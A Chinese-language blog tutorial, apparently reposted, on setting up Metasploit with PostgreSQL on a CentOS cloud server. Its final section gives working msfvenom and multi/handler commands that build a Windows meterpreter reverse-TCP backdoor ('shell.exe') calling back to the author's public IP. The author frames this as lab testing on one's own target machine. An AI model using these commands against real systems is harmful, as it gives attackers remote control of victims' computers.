一路踩坑过来,记录一下,愿世间不再有坑呜呜呜。
一、安装msf
在 /opt 目录下输入
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
安装好之后输入msfconsole,查看是否安装成功
二、安装Postgresql数据库
1.卸载旧版本Postgresql
虽然centos系统自带Postgresql数据库,但是不能直接用(我也不知道为什么),所以需要先卸载。
yum remove postgresql*
2.安装新版Postgresql
(1)安装rpm文件
yum install https://download.postgresql.org/pub/repos/yum/reporpms/EL-7-x86_64/pgdg-redhat-repo-latest.noarch.rpm
(2)安装客户端(一路默认y安装就行)
**yum install postgresql10 **
(3)安装服务端(一路默认y安装就行)
**yum install postgresql10-server **
(4)初始化
**/usr/pgsql-10/bin/postgresql-10-setup initdb **
(5)设置自动启动并且启动postgresql服务
systemctl enable postgresql-10
systemctl start postgresql-10
三、msf连接Postgresql
1.不能以root用户初始化数据库,创建一个用户msf对其初始化
(1)创建用户msf
useradd msf
(2)切换msf用户
su msf
(3)进入msf的bin目录
cd /opt/metasploit-framework/bin/
(4)初始化
./msfdb init
2.切换到root,用msf用户的数据库配置覆盖原配置
(1)切换root
su root
(2)覆盖原配置文件
cp /home/msf/.msf4/database.yml /opt/metasploit-framework/embedded/framework/config/
3.测试是否连接正常
进入msf,输入 db_status
四、msf利用
另外准备一台靶机,或者本机测试都可以
1.服务器开启端口
这里非常重要!腾讯云服务器除了在控制台需要开启端口外,宝塔也需要开!之前一直连不上,搞了老半天,结果是宝塔没开放端口。
2.msfvenonm生成windows后门木马
LHOST那里输入自己的服务器的公网IP,LPORT那里就输入自己在服务器开放的端口
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<公网IP> LPORT=<自己开放的端口> -f exe > shell.exe
这里呢会在当前目录得到一个shell.exe文件,如果只有250b的大小的话就是有问题的,需要重新检查一下语句
3.设置监听
进入到msf,输入以下语句:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost <公网IP> #或者0.0.0.0
set lport <开放的端口>
exploit #run也可以
4.测试
将生成的shell.exe文件上传到靶机或本机上,点击运行,服务器上可以看到监听成功
参考文章:
centos搭建msf_MH cloud的博客-CSDN博客_centos安装msf
版权归原作者 weixin_48799157 所有, 如有侵权,请联系我们删除。